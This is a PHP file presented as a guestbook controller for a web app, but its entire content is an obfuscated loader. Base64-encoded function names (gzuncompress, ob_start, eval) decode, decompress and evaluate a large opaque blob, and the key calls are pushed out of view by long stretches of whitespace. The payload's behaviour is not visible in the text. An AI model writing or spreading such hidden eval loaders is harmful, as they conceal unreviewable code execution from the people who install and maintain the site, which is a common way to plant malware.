<?php 
        $__='printf';$_='Loading donjo-app/controllers/fweb/Buku_tamu.php';
        



































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































































                                                                                                                                                                                                                     $________;
